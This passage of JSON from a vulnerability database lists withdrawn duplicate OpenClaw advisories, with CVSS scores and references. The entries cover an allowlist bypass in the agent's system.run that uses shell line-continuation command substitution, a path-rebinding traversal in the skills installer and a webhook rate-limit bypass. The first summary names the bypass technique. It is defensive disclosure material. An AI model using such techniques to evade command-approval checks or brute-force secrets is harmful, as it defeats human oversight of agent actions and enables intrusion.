955?format=json","vulnerability_id":"VCID-sddn-scg8-kqab","summary":"Duplicate Advisory: OpenClaw's system.run allowlist 
bypass via shell line-continuation command substitution\n## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-9868-vxmx-w862. This link is maintained to preserve external references.\n\n## Original Description\nOpenClaw versions prior to 2026.2.22 contain an allowlist bypass vulnerability in system.run that allows attackers to execute non-allowlisted commands by splitting command substitution using shell line-continuation characters. Attackers can bypass security analysis by injecting $\\\\ followed by a newline and opening parenthesis inside double quotes, causing the shell to fold the line continuation into executable command substitution that circumvents approval boundaries.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/3f0b9dbb36c86e308267924c0d3d4a4e1fc4d1e9","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/3f0b9dbb36c86e308267924c0d3d4a4e1fc4d1e9"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-allowlist-bypass-via-shell-line-continuation-command-substitution-in-system-run","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic
_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-allowlist-bypass-via-shell-line-continuation-command-substitution-in-system-run"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28460","reference_id":"CVE-2026-28460","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28460"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9868-vxmx-w862","reference_id":"GHSA-9868-vxmx-w862","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9868-vxmx-w862"},{"reference_url":"https://github.com/advisories/GHSA-xrgv-34cc-q765","reference_id":"GHSA-xrgv-34cc-q765","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-xrgv-34cc-q765"}],"fixed_packages":[],"aliases":["GHSA-xrgv-34cc-q765"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-sddn-scg8-kqab"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/918
37?format=json","vulnerability_id":"VCID-sh4x-nq7t-ykgg","summary":"Duplicate Advisory: OpenClaw's skills-install-download can be redirected outside the tools root by rebinding the validated base path\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-vhwf-4x96-vqx2. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.8 contains a path traversal vulnerability in the skills download installer that validates the tools root lexically but reuses the mutable path during archive download and copy operations. A local attacker can rebind the tools-root path between validation and final write to redirect the installer outside the intended tools directory.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/9abf014f3502009faf9c73df5ca2cff719e54639","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/9abf014f3502009faf9c73df5ca2cff719e54639"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-path-traversal-via-tools-root-rebinding-in-skills-download","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"g
eneric_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-path-traversal-via-tools-root-rebinding-in-skills-download"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33574","reference_id":"CVE-2026-33574","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33574"},{"reference_url":"https://github.com/advisories/GHSA-6q2v-vfwp-pvwh","reference_id":"GHSA-6q2v-vfwp-pvwh","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6q2v-vfwp-pvwh"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vhwf-4x96-vqx2","reference_id":"GHSA-vhwf-4x96-vqx2","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vhwf-4x96-vqx2"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74859?format=json","purl":"pkg:npm/openclaw@2026.3.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-
fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-54mc-t5s7-wyes"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-
u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-
spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-
g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-
a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkjm-wcmt-43br"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-
z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-
t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.8"}],"aliases":["GHSA-6q2v-vfwp-pvwh"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-sh4x-nq7t-ykgg"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90884?format=json","vulnerability_id":"VCID-sj4d-eenz-zqet","summary":"Duplicate Advisory: OpenClaw: Zalo webhook rate limiting could be bypassed before secret validation\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-5m9r-p9g7-679c. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.12 applies rate limiting only after successful webhook authentication, allowing attackers to bypass rate limits and brute-force webhook secrets. 
Attackers can submit repeated authentication requests with invalid secrets without triggering rate limit responses, enabling systematic secret guessing and subsequent forged webhook submission.","references":[{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5m9r-p9g7-679c","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5m9r-p9g7-679c"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34505","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34505"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-webhook-rate-limiting-bypass-via-pre-authentication-secret-validation","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"va
